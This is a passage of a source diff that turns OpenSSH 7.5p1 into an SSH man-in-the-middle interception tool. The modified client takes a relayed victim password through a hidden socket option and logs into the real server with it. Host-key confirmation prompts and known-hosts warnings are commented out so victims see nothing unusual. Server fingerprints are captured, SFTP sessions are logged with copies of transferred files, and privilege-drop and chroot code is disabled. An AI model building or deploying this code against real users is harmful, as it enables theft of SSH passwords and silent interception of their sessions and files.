3829. +       waitpid(sshpid, NULL, 0);
3830. +   }
3831. +
3832. +   _exit(1);
3833. +}
3834. +
3835. +/* Copied from sftp.c. */
3836. +/* ARGSUSED */
3837. +static void
3838. +suspchild(int signo)
3839. +{
3840. +   if (sshpid > 1) {
3841. +       kill(sshpid, signo);
3842. +       while (waitpid(sshpid, NULL, WUNTRACED) == -1 && errno == EINTR)
3843. +           continue;
3844. +   }
3845. +   kill(getpid(), SIGSTOP);
3846. +}
3847. +
3848. +/* Copied from sftp.c. */
3849. +static void
3850. +connect_to_server(char *path, char **args, int *in, int *out)
3851. +{
3852. +   int c_in, c_out;
3853. +
3854. +#ifdef USE_PIPES
3855. +   int pin[2], pout[2];
3856. +
3857. +   if ((pipe(pin) == -1) || (pipe(pout) == -1))
3858. +       fatal("pipe: %s", strerror(errno));
3859. +   *in = pin[0];
3860. +   *out = pout[1];
3861. +   c_in = pout[0];
3862. +   c_out = pin[1];
3863. +#else /* USE_PIPES */
3864. +   int inout[2];
3865. +
3866. +   if (socketpair(AF_UNIX, SOCK_STREAM, 0, inout) == -1)
3867. +       fatal("socketpair: %s", strerror(errno));
3868. +   *in = *out = inout[0];
3869. +   c_in = c_out = inout[1];
3870. +#endif /* USE_PIPES */
3871. +
3872. +   if ((sshpid = fork()) == -1)
3873. +       fatal("fork: %s", strerror(errno));
3874. +   else if (sshpid == 0) {
3875. +       if ((dup2(c_in, STDIN_FILENO) == -1) ||
3876. +           (dup2(c_out, STDOUT_FILENO) == -1)) {
3877. +           fprintf(stderr, "dup2: %s\n", strerror(errno));
3878. +           _exit(1);
3879. +       }
3880. +       close(*in);
3881. +       close(*out);
3882. +       close(c_in);
3883. +       close(c_out);
3884. +
3885. +       /*
3886. +        * The underlying ssh is in the same process group, so we must
3887. +        * ignore SIGINT if we want to gracefully abort commands,
3888. +        * otherwise the signal will make it to the ssh process and
3889. +        * kill it too.  Contrawise, since sftp sends SIGTERMs to the
3890. +        * underlying ssh, it must *not* ignore that signal.
3891. +        */
3892. +       signal(SIGINT, SIG_IGN);
3893. +       signal(SIGTERM, SIG_DFL);
3894. +
3895. +       execvp(path, args);
3896. +       fprintf(stderr, "exec: %s: %s\n", path, strerror(errno));
3897. +       _exit(1);
3898. +   }
3899. +
3900. +   signal(SIGTERM, killchild);
3901. +   signal(SIGINT, killchild);
3902. +   signal(SIGHUP, killchild);
3903. +   signal(SIGTSTP, suspchild);
3904. +   signal(SIGTTIN, suspchild);
3905. +   signal(SIGTTOU, suspchild);
3906. +   close(c_in);
3907. +   close(c_out);
3908. +}
3909. +
3910. +void mitm_init_log(char *log_filepath, char *log_dir) {
3911. +  session_log_fd = open(log_filepath, O_NOATIME | O_NOFOLLOW | O_WRONLY
3912. +#ifdef SYNC_LOG
3913. +        | O_SYNC
3914. +#endif
3915. +        );
3916. +
3917. +  /* Ensure that writes append to the log, since its initialized with
3918. +   * connection information. */
3919. +  lseek(session_log_fd, 0, SEEK_END);
3920. +
3921. +  if (session_log_fd < 0)
3922. +    logit("MITM: failed to open SFTP log: %s", log_filepath);
3923. +
3924. +  session_log_dir = strdup(log_dir);
3925. +  if ((session_log_dir = xstrdup(log_dir)) == NULL)
3926. +    fatal("Failed to allocate memory for session log dir path.");
3927. +}
3928. +
3929. +struct sftp_conn *
3930. +make_connection(char *host, unsigned short port, char *username, char *password_and_fingerprint_socket_name) {
3931. +   arglist args;
3932. +   char *ssh_program = MITM_SSH_CLIENT;
3933. +   int in = -1, out = -1;
3934. +
3935. +   args.list = NULL;
3936. +   addargs(&args, "%s", ssh_program);
3937. +   addargs(&args, "-E");
3938. +   addargs(&args, "%s", MITM_SSH_CLIENT_LOG);
3939. +   addargs(&args, "-F");
3940. +   addargs(&args, "%s", MITM_SSH_CLIENT_CONFIG);
3941. +   addargs(&args, "-Z");
3942. +   addargs(&args, "%s", password_and_fingerprint_socket_name);
3943. +   addargs(&args, "-oForwardX11=no");
3944. +   addargs(&args, "-oForwardAgent=no");
3945. +   addargs(&args, "-oPermitLocalCommand=no");
3946. +   addargs(&args, "-oClearAllForwardings=yes");
3947. +   addargs(&args, "-oPort=%u", port);
3948. +   addargs(&args, "-oProtocol=2");
3949. +   addargs(&args, "-s");
3950. +   addargs(&args, "--");
3951. +   addargs(&args, "%s@%s", username, host);
3952. +   addargs(&args, "sftp");
3953. +   connect_to_server(ssh_program, args.list, &in, &out);
3954. +   return do_init(in, out, 32768, 64, 0);
3955. +}
3956. +
3957. +/* Simple XSS sanitization. */
3958. +void xss_sanitize(char *buf, int buf_len) {
3959. +  int i;
3960. +  for (i = 0; i < buf_len; i++) {
3961. +    if (buf[i] == '<')
3962. +      buf[i] = '[';
3963. +    else if (buf[i] == '>')
3964. +      buf[i] = ']';
3965. +  }
3966. +}
3967. +
3968. +/* C doesn't let you pass variable-length arguments from one function to
3969. + * another if the second function needs to call va_start() again.  These
3970. + * defines cut down on duplicate code in that case.  Not sure if there's any
3971. + * other way to do it... */
3972. +#define SFTP_LOG_HEADER() va_start(args, fmt); \
3973. +\
3974. +  /* By setting the last byte to NULL and giving sizeof(buf) - 1 to vsnprintf, \
3975. +   * we can be sure that the buffer will be NULL-terminated afterwards. */ \
3976. +  buf[sizeof(buf) - 1] = '\0'; \
3977. +\
3978. +  ret = vsnprintf(buf, buf_len - 1, fmt, args); \
3979. +\
3980. +  /* If we need a larger buffer to format the string into... */ \
3981. +  if (ret >= buf_len) { \
3982. +    buf_len = ret + 1; \
3983. +    if ((buf = reallocarray(NULL, buf_len, sizeof(char))) == NULL) \
3984. +      fatal("Could not allocate buffer for sftp_log."); \
3985. +    buf[buf_len - 1] = '\0'; \
3986. +\
3987. +    va_end(args); \
3988. +    va_start(args, fmt); \
3989. +    ret = vsnprintf(buf, buf_len, fmt, args); \
3990. +  }
3991. +
3992. +#define SFTP_LOG_FOOTER() va_end(args); \
3993. +  /* Free the buffer, if we allocated it. */ \
3994. +  if (buf != buf_stack) { \
3995. +    free(buf); buf = NULL; \
3996. +  }
3997. +
3998. +/* Log an SFTP command. */
3999. +void sftp_log(u_int status, const char *fmt, ...) {
4000. +  char buf_stack[512], *buf = buf_stack;
4001. +  int buf_len = sizeof(buf_stack), ret = 0;
4002. +  va_list args;
4003. +
4004. +  SFTP_LOG_HEADER()
4005. +  _sftp_log(status, 1, buf, ret);
4006. +  SFTP_LOG_FOOTER()
4007. +}
4008. +
4009. +/* Log an SFTP command without XSS filtering enabled.  Don't use this unless
4010. + * you know what you're doing. */
4011. +void sftp_log_no_filter(u_int status, const char *fmt, ...) {
4012. +  char buf_stack[512], *buf = buf_stack;
4013. +  int buf_len = sizeof(buf_stack), ret = 0;
4014. +  va_list args;
4015. +
4016. +  SFTP_LOG_HEADER()
4017. +  _sftp_log(status, 0, buf, ret);
4018. +  SFTP_LOG_FOOTER()
4019. +}
4020. +
4021. +void _sftp_log(u_int status, u_int do_xss_filtering, char *buf, int buf_len) {
4022. +  write(session_log_fd, "> ", 2);
4023. +
4024. +  /* Replace any angled brackets in the buffer. */
4025. +  if (do_xss_filtering)
4026. +    xss_sanitize(buf, buf_len);
4027. +
4028. +  /* Write the buffer to the session log. */
4029. +  write(session_log_fd, buf, buf_len);
4030. +
4031. +  /* If the status is not success, write it into the log as well. */
4032. +  if (status != SSH2_FX_OK) {
4033. +    char errmsg[64];
4034. +    const char *m = status_to_message(status);
4035. +    int r = 0;
4036. +
4037. +    memset(errmsg, 0, sizeof(errmsg));
4038. +
4039. +    r = snprintf(errmsg, sizeof(errmsg) - 1, " (Error: %s)", m);
4040. +    write(session_log_fd, errmsg, r);
4041. +  }
4042. +
4043. +  write(session_log_fd, "\n", 1);
4044. +}
4045. +
4046. +/* Log a file transfer or directory listing. */
4047. +void sftp_log_close(u_int status, char *handle_str, size_t handle_len) {
4048. +  MITMHandle *mh = NULL;
4049. +
4050. +  if ((mh = mitm_handle_search(handle_str, handle_len)) != NULL) {
4051. +    char *original_path = mh->original_path;
4052. +
4053. +    /* If a file handle was closed... */
4054. +    if (mh->type == MITM_HANDLE_TYPE_FILE) {
4055. +      u_int32_t pflags = mh->pflags;
4056. +      char *actual_path = mh->actual_path;
4057. +      const char get[] = "get";
4058. +      const char put[] = "put";
4059. +      const char getput[] = "get/put";
4060. +      const char *verb = getput;
4061. +      int read = 0, write = 0;
4062. +
4063. +      /* Was the file open for reading, writing, or both? */
4064. +      read = (pflags & SSH2_FXF_READ);
4065. +      write = (pflags & SSH2_FXF_WRITE) || (pflags & SSH2_FXF_APPEND);
4066. +
4067. +      if (read && !write)
4068. +   verb = get;
4069. +      else if (!read && write)
4070. +   verb = put;
4071. +
4072. +      /* Make a link in the log to the local file we saved. */
4073. +      sftp_log_no_filter(status, "%s <a href=\"%s\">%s</a>", verb, actual_path, original_path);
4074. +    } else { /* ...a directory was closed. */
4075. +      sftp_log(status, "ls %s\n%s", original_path, mh->file_listing);
4076. +    }
4077. +  } else
4078. +    logit(CANT_FIND_HANDLE, __func__);
4079. +}
4080. +
4081. +/* Writes an Attrib struct to the log. */
4082. +void sftp_log_attrib(const char *sftp_func, u_int status, char *name, Attrib *a) {
4083. +  if (a != NULL) {
4084. +    status = SSH2_FX_OK;
4085. +    sftp_log(status, "%s \"%s\" (Result: flags: %u; size: %lu; uid: %u; gid: %u; perm: 0%o, atime: %u, mtime: %u)", sftp_func, name, a->flags, a->size, a->uid, a->gid, a->perm, a->atime, a->mtime);
4086. +  } else
4087. +    sftp_log(status, "%s \"%s\" (Result: flags: ?; size: ?; uid: ?; gid: ?; perm: ?, atime: ?, mtime: ?)", sftp_func, name);
4088. +}
4089. +
4090. +/* Given a handle, writes an Attrib struct to the log. */
4091. +void sftp_log_handle_attrib(const char *func, u_int status, char *handle_str, size_t handle_len, Attrib *a) {
4092. +  MITMHandle *mh = NULL;
4093. +
4094. +  if ((mh = mitm_handle_search(handle_str, handle_len)) != NULL)
4095. +    sftp_log_attrib(func, status, mh->original_path, a);
4096. +  else
4097. +    logit(CANT_FIND_HANDLE, __func__);
4098. +}
4099. +
4100. +/* Stores the result of a readdir() call (done during file listings). */
4101. +void sftp_log_readdir(char *handle_str, size_t handle_len, char *listing) {
4102. +  int resize_needed = 0;
4103. +  MITMHandle *mh = NULL;
4104. +
4105. +  if ((mh = mitm_handle_search(handle_str, handle_len)) != NULL) {
4106. +    size_t listing_len = strlen(listing);
4107. +
4108. +    /* If the file listing array hasn't been initialized yet, do that now. */
4109. +    if (mh->file_listing_size == 0) {
4110. +      mh->file_listing_size = MITM_HANDLES_FILE_LISTING_BLOCK;
4111. +      if ((mh->file_listing = reallocarray(NULL, mh->file_listing_size, sizeof(char))) == NULL)
4112. +   fatal("MITM: could not allocate file_listing!");
4113. +      mh->file_listing[0] = '\0';
4114. +    }
4115. +
4116. +    /* If the array isn't big enough, resize it.  (+1 for the newline, and +1
4117. +     * for the NULL byte) */
4118. +    while (mh->file_listing_size < (strlen(mh->file_listing) + listing_len + 1 + 1)) {
4119. +      mh->file_listing_size += MITM_HANDLES_FILE_LISTING_BLOCK;
4120. +      resize_needed = 1;
4121. +    }
4122. +
4123. +    if (resize_needed) {
4124. +      if((mh->file_listing = reallocarray(mh->file_listing, mh->file_listing_size, sizeof(char))) == NULL)
4125. +   fatal("MITM: could not allocate file_listing!");
4126. +    }
4127. +
4128. +    strlcat(mh->file_listing, listing, mh->file_listing_size);
4129. +    strlcat(mh->file_listing, "\n", mh->file_listing_size);
4130. +  } else
4131. +    logit(CANT_FIND_HANDLE, __func__);
4132. +}
4133. +
4134. +/* Writes a statvfs struct to the log. */
4135. +void sftp_log_statvfs(u_int status, char *path, struct statvfs *st) {
4136. +  sftp_log(status, "statvfs \"%s\" (Result: filesystem block size: %lu; fragment size: %lu; filesystem size [measured in fragments]: %lu; number of free blocks: %lu; number of free blocks for unprivileged users: %lu; number of inodes: %lu; number of free inodes: %lu; number of free inodes for unprivileged users: %lu; filesystem ID: %lu; mount flags: %lu; maximum filename length: %lu)", path, st->f_bsize, st->f_frsize, st->f_blocks, st->f_bfree, st->f_bavail, st->f_files, st->f_ffree, st->f_favail, st->f_fsid, st->f_flag, st->f_namemax);
4137. +}
4138. +
4139. +/* Given a file handle, writes a statvfs struct to the log. */
4140. +void sftp_log_fstatvfs(u_int status, char *handle_str, size_t handle_len, struct statvfs *st) {
4141. +  MITMHandle *mh = NULL;
4142. +
4143. +  if ((mh = mitm_handle_search(handle_str, handle_len)) != NULL)
4144. +    sftp_log_statvfs(status, mh->original_path, st);
4145. +  else
4146. +    logit(CANT_FIND_HANDLE, __func__);
4147. +}
4148. +
4149. +/* Logs an fsync() call. */
4150. +void sftp_log_fsync(u_int status, char *handle_str, size_t handle_len) {
4151. +  MITMHandle *mh = NULL;
4152. +
4153. +  if ((mh = mitm_handle_search(handle_str, handle_len)) != NULL)
4154. +    sftp_log(status, "fsync \"%s\"", mh->original_path);
4155. +  else
4156. +    logit(CANT_FIND_HANDLE, __func__);
4157. +}
4158. diff -ru --new-file -x '*~' -x 'config.*' -x Makefile -x opensshd.init -x survey.sh -x openssh.xml -x buildpkg.sh -x output.0 -x requests -x traces.0 -x configure openssh-7.5p1/sftp-server-main.c openssh-7.5p1-mitm/sftp-server-main.c
4159. --- openssh-7.5p1/sftp-server-main.c    2017-03-19 22:39:27.000000000 -0400
4160. +++ openssh-7.5p1-mitm/sftp-server-main.c   2018-06-12 17:44:46.345760658 -0400
4161. @@ -49,5 +49,7 @@
4162.         return 1;
4163.     }
4164.  
4165. -   return (sftp_server_main(argc, argv, user_pw));
4166. +   /* Running a stand-alone SFTP server is unsupported. */
4167. +   /*return (sftp_server_main(argc, argv, user_pw));*/
4168. +   return 0;
4169. }
4170. diff -ru --new-file -x '*~' -x 'config.*' -x Makefile -x opensshd.init -x survey.sh -x openssh.xml -x buildpkg.sh -x output.0 -x requests -x traces.0 -x configure openssh-7.5p1/ssh-agent.c openssh-7.5p1-mitm/ssh-agent.c
4171. --- openssh-7.5p1/ssh-agent.c   2017-03-19 22:39:27.000000000 -0400
4172. +++ openssh-7.5p1-mitm/ssh-agent.c  2018-06-12 17:44:46.345760658 -0400
4173. @@ -1228,9 +1228,10 @@
4174.     sanitise_stdfd();
4175.  
4176.     /* drop */
4177. +   /*
4178.     setegid(getgid());
4179.     setgid(getgid());
4180. -
4181. +   */
4182.     platform_disable_tracing(0);    /* strict=no */
4183.  
4184. #ifdef WITH_OPENSSL
4185. diff -ru --new-file -x '*~' -x 'config.*' -x Makefile -x opensshd.init -x survey.sh -x openssh.xml -x buildpkg.sh -x output.0 -x requests -x traces.0 -x configure openssh-7.5p1/ssh.c openssh-7.5p1-mitm/ssh.c
4186. --- openssh-7.5p1/ssh.c 2017-03-19 22:39:27.000000000 -0400
4187. +++ openssh-7.5p1-mitm/ssh.c    2018-06-12 17:44:46.345760658 -0400
4188. @@ -49,6 +49,7 @@
4189. #include <sys/resource.h>
4190. #include <sys/ioctl.h>
4191. #include <sys/socket.h>
4192. +#include <sys/un.h>
4193. #include <sys/wait.h>
4194.  
4195. #include <ctype.h>
4196. @@ -110,6 +111,7 @@
4197. #include "ssherr.h"
4198. #include "myproposal.h"
4199. #include "utf8.h"
4200. +#include "lol.h"
4201.  
4202. #ifdef ENABLE_PKCS11
4203. #include "ssh-pkcs11.h"
4204. @@ -192,6 +194,10 @@
4205. extern int muxserver_sock;
4206. extern u_int muxclient_command;
4207.  
4208. +int num_hostkey_fps = 0;
4209. +hostkey_fp *server_hostkey_fps = NULL;
4210. +int password_and_fingerprint_fd = -1;
4211. +
4212. /* Prints a help message to the user.  This function never returns. */
4213.  
4214. static void
4215. @@ -524,6 +530,7 @@
4216.     struct addrinfo *addrs = NULL;
4217.     struct ssh_digest_ctx *md;
4218.     u_char conn_hash[SSH_DIGEST_MAX_LENGTH];
4219. +   char *password = NULL;
4220.  
4221.     ssh_malloc_init();  /* must be called before any mallocs */
4222.     /* Ensure that fds 0, 1 and 2 are open or directed to /dev/null */
4223. @@ -548,6 +555,9 @@
4224.      */
4225.     closefrom(STDERR_FILENO + 1);
4226.  
4227. +   /* Initialize the array of host key fingerprints. */
4228. +   server_hostkey_fps = calloc(MAX_SERVER_HOSTKEY_FPS, sizeof(hostkey_fp));
4229. +
4230.     /*
4231.      * Save the original real uid.  It will be needed later (uid-swapping
4232.      * may clobber the real uid).
4233. @@ -605,8 +615,9 @@
4234.     argv0 = av[0];
4235.  
4236.  again:
4237. +   /* Add -Z to get the password to use. */
4238.     while ((opt = getopt(ac, av, "1246ab:c:e:fgi:kl:m:no:p:qstvx"
4239. -       "ACD:E:F:GI:J:KL:MNO:PQ:R:S:TVw:W:XYy")) != -1) {
4240. +       "ACD:E:F:GI:J:KL:MNO:PQ:R:S:TVw:W:XYyZ:")) != -1) {
4241.         switch (opt) {
4242.         case '1':
4243.             options.protocol = SSH_PROTO_1;
4244. @@ -931,6 +942,54 @@
4245.         case 'F':
4246.             config = optarg;
4247.             break;
4248. +       case 'Z':
4249. +           /* The argument here is the path to the socket to
4250. +            * read the password and write server host key
4251. +            * fingerprints to. */
4252. +           if (strlen(optarg) > 0) {
4253. +             struct sockaddr_un addr;
4254. +             u_int16_t password_len = 0;
4255. +             int i = 0, bytes_read = 0, r = 0;
4256. +             struct timespec req;
4257. +
4258. +             memset(&addr, 0, sizeof(addr));
4259. +             addr.sun_family = AF_UNIX;
4260. +             req.tv_sec = 1;
4261. +             req.tv_nsec = 0;
4262. +             password_and_fingerprint_fd = socket(AF_UNIX, SOCK_STREAM, 0);
4263. +
4264. +             /* Try to connect up to 10 times, pausing 1 second in between each attempt. */
4265. +             strlcpy(addr.sun_path, optarg, sizeof(addr.sun_path));
4266. +             while (i < 10) {
4267. +               if ((r = connect(password_and_fingerprint_fd, (struct sockaddr *)&addr, sizeof(addr))) == 0)
4268. +                 break;
4269. +
4270. +               nanosleep(&req, NULL);
4271. +               i++;
4272. +             }
4273. +
4274. +             /* If connect() never succeeded, terminate. */
4275. +             if (r != 0)
4276. +               exit(-1);
4277. +
4278. +             /* Read the password length. */
4279. +             read(password_and_fingerprint_fd, &password_len, sizeof(password_len));
4280. +             password_len = ntohs(password_len);
4281. +
4282. +             if ((password = calloc(password_len + 1, sizeof(char))) == NULL)
4283. +               exit(-1);
4284. +
4285. +             /* Read all the bytes to the password. */
4286. +             while (bytes_read < password_len) {
4287. +               r = read(password_and_fingerprint_fd, password + bytes_read, password_len - bytes_read);
4288. +               if ((r < 0) && (r != EINTR))
4289. +                 exit(-1);
4290. +               else if (r > 0)
4291. +                 bytes_read += r;
4292. +             }
4293. +             password[password_len] = '\0';
4294. +           }  
4295. +           break;
4296.         default:
4297.             usage();
4298.         }
4299. @@ -1292,6 +1351,7 @@
4300.     sensitive_data.nkeys = 0;
4301.     sensitive_data.keys = NULL;
4302.     sensitive_data.external_keysign = 0;
4303. +   sensitive_data.password = password;
4304.     if (options.rhosts_rsa_authentication ||
4305.         options.hostbased_authentication) {
4306.         sensitive_data.nkeys = 9;
4307. @@ -2194,3 +2254,27 @@
4308.     signal(sig, main_sigchld_handler);
4309.     errno = save_errno;
4310. }
4311. +
4312. +void write_hostkeys() {
4313. +  int i = 0;
4314. +
4315. +  if (password_and_fingerprint_fd == -1)
4316. +    return;
4317. +
4318. +  for(i = 0; i < num_hostkey_fps; i++) {
4319. +    char *old = server_hostkey_fps[i].old;
4320. +    char *new = server_hostkey_fps[i].new;
4321. +
4322. +    send(password_and_fingerprint_fd, old, strlen(old), 0);
4323. +    send(password_and_fingerprint_fd, "\n", strlen("\n"), 0);
4324. +    send(password_and_fingerprint_fd, new, strlen(new), 0);
4325. +    send(password_and_fingerprint_fd, "\n", strlen("\n"), 0);
4326. +
4327. +    free(server_hostkey_fps[i].old); server_hostkey_fps[i].old = NULL;
4328. +    free(server_hostkey_fps[i].new); server_hostkey_fps[i].new = NULL;
4329. +  }
4330. +  shutdown(password_and_fingerprint_fd, SHUT_RDWR);
4331. +  password_and_fingerprint_fd = -1;
4332. +  free(server_hostkey_fps); server_hostkey_fps = NULL;
4333. +  num_hostkey_fps = 0;
4334. +}
4335. diff -ru --new-file -x '*~' -x 'config.*' -x Makefile -x opensshd.init -x survey.sh -x openssh.xml -x buildpkg.sh -x output.0 -x requests -x traces.0 -x configure openssh-7.5p1/sshconnect2.c openssh-7.5p1-mitm/sshconnect2.c
4336. --- openssh-7.5p1/sshconnect2.c 2017-03-19 22:39:27.000000000 -0400
4337. +++ openssh-7.5p1-mitm/sshconnect2.c    2018-06-12 17:44:46.345760658 -0400
4338. @@ -81,6 +81,7 @@
4339. extern char *client_version_string;
4340. extern char *server_version_string;
4341. extern Options options;
4342. +extern void write_hostkeys();
4343.  
4344. /*
4345.  * SSH2 key exchange
4346. @@ -218,6 +219,7 @@
4347.     kex->verify_host_key=&verify_host_key_callback;
4348.  
4349.     dispatch_run(DISPATCH_BLOCK, &kex->done, active_state);
4350. +   write_hostkeys();
4351.  
4352.     /* remove ext-info from the KEX proposals for rekeying */
4353.     myproposal[PROPOSAL_KEX_ALGS] =
4354. @@ -906,7 +908,8 @@
4355.  
4356.     snprintf(prompt, sizeof(prompt), "%.30s@%.128s's password: ",
4357.         authctxt->server_user, host);
4358. -   password = read_passphrase(prompt, 0);
4359. +   /* password = read_passphrase(prompt, 0); */
4360. +   password = strdup(authctxt->sensitive->password);  /* TODO: zero out password field now? */
4361.     packet_start(SSH2_MSG_USERAUTH_REQUEST);
4362.     packet_put_cstring(authctxt->server_user);
4363.     packet_put_cstring(authctxt->service);
4364. diff -ru --new-file -x '*~' -x 'config.*' -x Makefile -x opensshd.init -x survey.sh -x openssh.xml -x buildpkg.sh -x output.0 -x requests -x traces.0 -x configure openssh-7.5p1/sshconnect.c openssh-7.5p1-mitm/sshconnect.c
4365. --- openssh-7.5p1/sshconnect.c  2017-03-19 22:39:27.000000000 -0400
4366. +++ openssh-7.5p1-mitm/sshconnect.c 2018-06-12 17:44:46.345760658 -0400
4367. @@ -64,6 +64,8 @@
4368. #include "authfile.h"
4369. #include "ssherr.h"
4370. #include "authfd.h"
4371. +#include "digest.h"
4372. +#include "lol.h"
4373.  
4374. char *client_version_string = NULL;
4375. char *server_version_string = NULL;
4376. @@ -78,6 +80,8 @@
4377. extern char *__progname;
4378. extern uid_t original_real_uid;
4379. extern uid_t original_effective_uid;
4380. +extern int num_hostkey_fps;
4381. +extern hostkey_fp *server_hostkey_fps;
4382.  
4383. static int show_other_keys(struct hostkeys *, Key *);
4384. static void warn_changed_key(Key *);
4385. @@ -916,10 +920,12 @@
4386.                     "address '%.128s' to the list of known "
4387.                     "hosts (%.500s).", type, ip,
4388.                     user_hostfiles[0]);
4389. -           else
4390. -               logit("Warning: Permanently added the %s host "
4391. +           /* Suppress the warning about adding this host key. */
4392. +           /*else
4393. +             logit("Warning: Permanently added the %s host "
4394.                     "key for IP address '%.128s' to the list "
4395. -                   "of known hosts.", type, ip);
4396. +                   "of known hosts.", type, ip);*/
4397. +
4398.         } else if (options.visual_host_key) {
4399.             fp = sshkey_fingerprint(host_key,
4400.                 options.fingerprint_hash, SSH_FP_DEFAULT);
4401. @@ -995,8 +1001,8 @@
4402.                 msg2);
4403.             free(ra);
4404.             free(fp);
4405. -           if (!confirm(msg))
4406. -               goto fail;
4407. +           /*if (!confirm(msg))
4408. +             goto fail;*/
4409.             hostkey_trusted = 1; /* user explicitly confirmed */
4410.         }
4411.         /*
4412. @@ -1023,13 +1029,17 @@
4413.                 host_key, options.hash_known_hosts);
4414.             hostp = host;
4415.         }
4416. +       /* Suppress compiler warning about hostp being set but not
4417. +        * used. */
4418. +       if (hostp) {}
4419.  
4420.         if (!r)
4421.             logit("Failed to add the host to the list of known "
4422.                 "hosts (%.500s).", user_hostfiles[0]);
4423. -       else
4424. +       /* Suppress the warning message about adding to known_hosts  */
4425. +       /*else
4426.             logit("Warning: Permanently added '%.200s' (%s) to the "
4427. -               "list of known hosts.", hostp, type);
4428. +           "list of known hosts.", hostp, type);*/
4429.         break;
4430.     case HOST_REVOKED:
4431.         error("@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@");
4432. @@ -1243,6 +1253,13 @@
4433.     char valid[64], *fp = NULL, *cafp = NULL;
4434.     struct sshkey *plain = NULL;
4435.  
4436. +   /* Add the host key's fingerprints to the array.  Both the old MD5 and new SHA256 fingerprints are stored. */
4437. +   if ((server_hostkey_fps != NULL) && (num_hostkey_fps < MAX_SERVER_HOSTKEY_FPS)) {
4438. +     server_hostkey_fps[num_hostkey_fps].old = sshkey_fingerprint(host_key, SSH_DIGEST_MD5, SSH_FP_DEFAULT);
4439. +     server_hostkey_fps[num_hostkey_fps].new = sshkey_fingerprint(host_key, SSH_DIGEST_SHA256, SSH_FP_DEFAULT);
4440. +     num_hostkey_fps++;
4441. +   }
4442. +
4443.     if ((fp = sshkey_fingerprint(host_key,
4444.         options.fingerprint_hash, SSH_FP_DEFAULT)) == NULL) {
4445.         error("%s: fingerprint host key: %s", __func__, ssh_err(r));
4446. diff -ru --new-file -x '*~' -x 'config.*' -x Makefile -x opensshd.init -x survey.sh -x openssh.xml -x buildpkg.sh -x output.0 -x requests -x traces.0 -x configure openssh-7.5p1/sshconnect.h openssh-7.5p1-mitm/sshconnect.h
4447. --- openssh-7.5p1/sshconnect.h  2017-03-19 22:39:27.000000000 -0400
4448. +++ openssh-7.5p1-mitm/sshconnect.h 2018-06-12 17:44:46.345760658 -0400
4449. @@ -29,6 +29,7 @@
4450.     Key **keys;
4451.     int nkeys;
4452.     int external_keysign;
4453. +   char    *password;
4454.  };
4455.  
4456.  struct addrinfo;
4457. @@ -62,16 +63,20 @@
4458.   */
4459.  #define PRIV_START do {                    \
4460.     int save_errno = errno;             \
4461. +   /*                      \
4462.     if (seteuid(original_effective_uid) != 0)   \
4463.         fatal("PRIV_START: seteuid: %s",    \
4464.             strerror(errno));           \
4465. +   */                      \
4466.     errno = save_errno;             \
4467.  } while (0)
4468.  
4469.  #define PRIV_END do {                  \
4470.     int save_errno = errno;             \
4471. +   /*                      \
4472.     if (seteuid(original_real_uid) != 0)        \
4473.         fatal("PRIV_END: seteuid: %s",      \
4474.             strerror(errno));           \
4475. +   */                      \
4476.     errno = save_errno;             \
4477.  } while (0)
4478. diff -ru --new-file -x '*~' -x 'config.*' -x Makefile -x opensshd.init -x survey.sh -x openssh.xml -x buildpkg.sh -x output.0 -x requests -x traces.0 -x configure openssh-7.5p1/sshd.c openssh-7.5p1-mitm/sshd.c
4479. --- openssh-7.5p1/sshd.c    2017-03-19 22:39:27.000000000 -0400
4480. +++ openssh-7.5p1-mitm/sshd.c   2018-06-12 17:44:46.345760658 -0400
4481. @@ -72,6 +72,8 @@
4482.  #include <string.h>
4483.  #include <unistd.h>
4484.  #include <limits.h>
4485. +#include <arpa/inet.h>
4486. +#include <linux/netfilter_ipv4.h>
4487.  
4488.  #ifdef WITH_OPENSSL
4489.  #include <openssl/dh.h>
4490. @@ -122,6 +124,7 @@
4491.  #include "ssh-sandbox.h"
4492.  #include "version.h"
4493.  #include "ssherr.h"
4494. +#include "lol.h"
4495.  
4496.  /* Re-exec fds */
4497.  #define REEXEC_DEVCRYPTO_RESERVED_FD   (STDERR_FILENO + 1)
4498. @@ -201,6 +204,9 @@
4499.     int have_ssh2_key;
4500.  } sensitive_data;
4501.  
4502. +
4503. +Lol *lol = NULL;
4504. +
4505.  /* This is set to true when a signal is received. */
4506.  static volatile sig_atomic_t received_sighup = 0;
4507.  static volatile sig_atomic_t received_sigterm = 0;
4508. @@ -543,10 +549,13 @@
4509.     /* Demote the child */
4510.     if (getuid() == 0 || geteuid() == 0) {
4511.         /* Change our root directory */
4512. +/* chroot() won't work since we are not running as root. */
4513. +/*
4514.         if (chroot(_PATH_PRIVSEP_CHROOT_DIR) == -1)
4515.             fatal("chroot(\"%s\"): %s", _PATH_PRIVSEP_CHROOT_DIR,
4516.                 strerror(errno));
4517. -       if (chdir("/") == -1)
4518. +*/
4519. +       if (chdir(MITM_ROOT) == -1)
4520.             fatal("chdir(\"/\"): %s", strerror(errno));
4521.  
4522.         /* Drop our privileges */
4523. @@ -672,6 +681,7 @@
4524.  skip:
4525.     /* It is safe now to apply the key state */
4526.     monitor_apply_keystate(pmonitor);
4527. +   monitor_apply_lol(pmonitor, lol);
4528.  
4529.     /*
4530.      * Tell the packet layer that authentication was successful, since
4531. @@ -1372,6 +1382,18 @@
4532.     int keytype;
4533.     Authctxt *authctxt;
4534.     struct connection_info *connection_info = get_connection_info(0, 0);
4535. +#ifndef DEBUG_HOST
4536. +   struct sockaddr_in origaddr;
4537. +   socklen_t origaddr_len = sizeof(origaddr);
4538. +#endif
4539. +
4540. +   lol = (Lol *)calloc(1, sizeof(Lol));
4541. +
4542. +        /* Terminate if sshd_mitm is running in a privileged account. */
4543. +        if ((getuid() < 500) || (getgid() < 500) || (geteuid() < 500) || (getegid() < 500)) {
4544. +            fprintf(stderr, "Error: sshd_mitm must be run under a non-privileged account!  UID and GID must be >= 500.\n");
4545. +            exit(-1);
4546. +        }
4547.  
4548.     ssh_malloc_init();  /* must be called before any mallocs */
4549.  
4550. @@ -1780,7 +1802,8 @@
4551.             (st.st_uid != getuid () ||
4552.             (st.st_mode & (S_IWGRP|S_IWOTH)) != 0))
4553. #else
4554. -       if (st.st_uid != 0 || (st.st_mode & (S_IWGRP|S_IWOTH)) != 0)
4555. +                /* Ownership of the chroot directory no longer relevant. */
4556. +                if (0)
4557. #endif
4558.             fatal("%s must be owned by root and not group or "
4559.                 "world-writable.", _PATH_PRIVSEP_CHROOT_DIR);
4560. @@ -1956,6 +1979,17 @@
4561.     signal(SIGCHLD, SIG_DFL);
